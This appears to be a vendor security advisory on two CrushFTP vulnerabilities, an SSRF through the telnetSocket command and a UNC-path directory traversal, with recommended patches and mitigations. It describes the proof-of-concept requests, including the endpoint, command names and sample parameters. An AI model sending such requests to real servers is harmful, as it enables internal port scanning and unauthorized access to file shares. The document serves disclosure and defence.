Vulnerabilities in CrushFTP Could Allow Internal Scanning and SMB File Access
CrushFTP versions 9.x, 10.x up to 10.8.4, and 11.x up to 11.3.1 are affected by two critical vulnerabilities: CVE-2025-32102 (Server-Side Request Forgery) and CVE-2025-32103 (Directory Traversal). The SSRF flaw stems from improper validation of telnetSocket requests, allowing arbitrary port scanning. The Directory Traversal issue permits unauthorized access to SMB-shared files through manipulation of UNC paths. Proof-of-concept (PoC) exploits for both vulnerabilities are publicly available. Updating to the latest version of CrushFTP is strongly recommended to address these issues.
Technical Description
CrushFTP, a widely used file transfer server, is under heightened scrutiny after two major security flaws were discovered. The vulnerabilities, tracked as CVE-2025-32102 and CVE-2025-32103, make the server susceptible to Server-Side Request Forgery (SSRF) and Directory Traversal attacks, respectively.
SSRF Vulnerability(CVE-2025-32102)
CrushFTP’s /WebInterface/function/ endpoint includes a telnet-based connectivity testing feature, exposing the telnetSocket command with configurable host and port parameters. Due to insufficient input validation, an attacker can manipulate these fields to initiate arbitrary connections to internal or external systems. The application’s responses—such as “Connected” or “Connection refused”—can reveal port status, enabling internal network reconnaissance and port scanning. This behavior aligns with a Server-Side Request Forgery (SSRF) vulnerability, classified under CWE-918.
By submitting crafted POST requests with altered host and port parameters, attackers can determine whether specific ports are open or closed. For example, a request to 127.0.0.1:8080 may generate a “Connected” response, whereas 127.0.0.1:8888 might return “Connection refused.” This stealthy scanning technique can expose internal services, which may assist in further exploitation, especially in cloud environments where sensitive endpoints, such as metadata APIs or administrative interfaces, are accessible internally.
The proof-of-concept showcases a POST request to the /WebInterface/function/ endpoint utilizing the telnetSocket command. By modifying inputs like host=127.0.0.1 and port=8080, the server’s response indicates connection success or failure. These responses are wrapped in XML tags, allowing easy automation through scripting. The exploit can be executed without full authentication if the attacker possesses valid session cookies or if the administrative interface is publicly accessible.
Directory Traversal (CVE-2025-32103):
The directory traversal flaw stems from how CrushFTP processes file path inputs via the /WebInterface/function/ endpoint. Specifically, the getAdminXMLListing command—intended to display directory contents—does not properly sanitize UNC path inputs. Instead of supplying a standard local path (e.g., C:/data), an attacker can insert a UNC path like \\server\resource, granting access to remote SMB shares.
This vulnerability arises from the application’s failure to validate or restrict external file system references, enabling access to directories outside the local machine’s intended security boundaries. Crucially, this behavior circumvents the SecurityManager—CrushFTP’s primary access control mechanism—rendering its policy enforcement ineffective in preventing unauthorized directory traversal.
The proof-of-concept involves sending a POST request with the parameter path=\\\\vboxsrv\\demo using the getAdminXMLListing function. The server responds with an XML-based directory listing from the SMB share, including metadata such as name, href_path, root_dir, and privs, confirming successful enumeration of the remote file system.
Conclusion:
These vulnerabilities highlight ongoing weaknesses in input validation within critical web-facing components. The SSRF issue exploits telnet-based connectivity checks to circumvent network boundaries, while the directory traversal flaw enables access to internal or remote file systems through UNC path injection. Both exploits require minimal technical expertise, emphasizing the urgent need for strict input sanitization and robust access controls in administrative web interfaces.
Impact
Both vulnerabilities impact CrushFTP versions 9.x, all 10.x up to 10.8.4, and 11.x through 11.3.1. These versions are widely used in enterprise environments, significantly raising the risk profile. Since the affected interface is typically exposed for administrative purposes, insufficient network segmentation can result in unintended external exposure. Exploitation of CVE-2025-32102 may enable internal port scanning or unauthorized access to internal services, while CVE-2025-32103 allows attackers to bypass local access controls and interact with remote SMB shares. Together, these flaws introduce serious risks, including information disclosure, lateral movement, and the potential staging of follow-on attacks.
IOC and Context Details
| Topics | Details |
|---|---|
| Tactic Name | NA |
| Technique Name | NA |
| Sub Technique Name | NA |
| Attack Type | Vulnerability |
| Targeted Applications | CrushFTP |
| Region Impacted | Global |
| Industry Impacted | All |
| IOC’s | NA |
| CVE | CVE-2025-32103 , CVE-2025-32102 |
Recommended Actions
- Promptly update CrushFTP to the latest patched version beyond 11.3.1.
- Use firewalls or reverse proxies to restrict access to the /WebInterface/function/ endpoints.
- Implement thorough validation and sanitization of all user inputs, particularly those related to network paths.
- Disable any unnecessary features, such as telnet-based diagnostic tools, in production environments.
- Conduct regular audits of access control settings and assess the use of SMB paths in workflows.